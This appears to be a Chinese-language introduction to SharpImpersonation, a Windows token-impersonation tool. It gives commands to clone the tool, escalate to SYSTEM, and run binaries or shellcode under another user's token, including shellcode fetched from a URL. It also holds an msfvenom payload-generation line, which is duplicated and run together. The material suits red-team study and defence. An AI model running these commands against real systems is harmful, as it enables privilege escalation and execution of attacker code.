1、使用list参数枚举本地系统中的所有用户; 2、以非提权上下文枚举本地系统中的所有用户; 3、自动提权为“SYSTEM”; 4、搜索目标用户名的第一个进程,将其进程ID作为目标; 5、支持从Webserver加载Stager; 6、......
git clone https://github.com/S3cur3Th1sSh1t/SharpImpersonation.git
PS > PS C:\temp> SharpImpersonation.exe list
PS > PS C:\temp> SharpImpersonation.exe list elevated
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
(向右滑动,查看更多)
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
(向右滑动,查看更多)
msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=threadmsfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0
https://github.com/0xbadjuju/Tokenvator https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/ https://lolbas-project.github.io/ https://thewover.github.io/Dynamic-Invoke/ https://github.com/TheWover/DInvoke https://github.com/djhohnstein/SharpChromium https://github.com/V1V1/SharpScribbles/tree/master/ThunderFox https://s3cur3th1ssh1t.github.io/On-how-to-access-protected-networks/ https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf
精彩推荐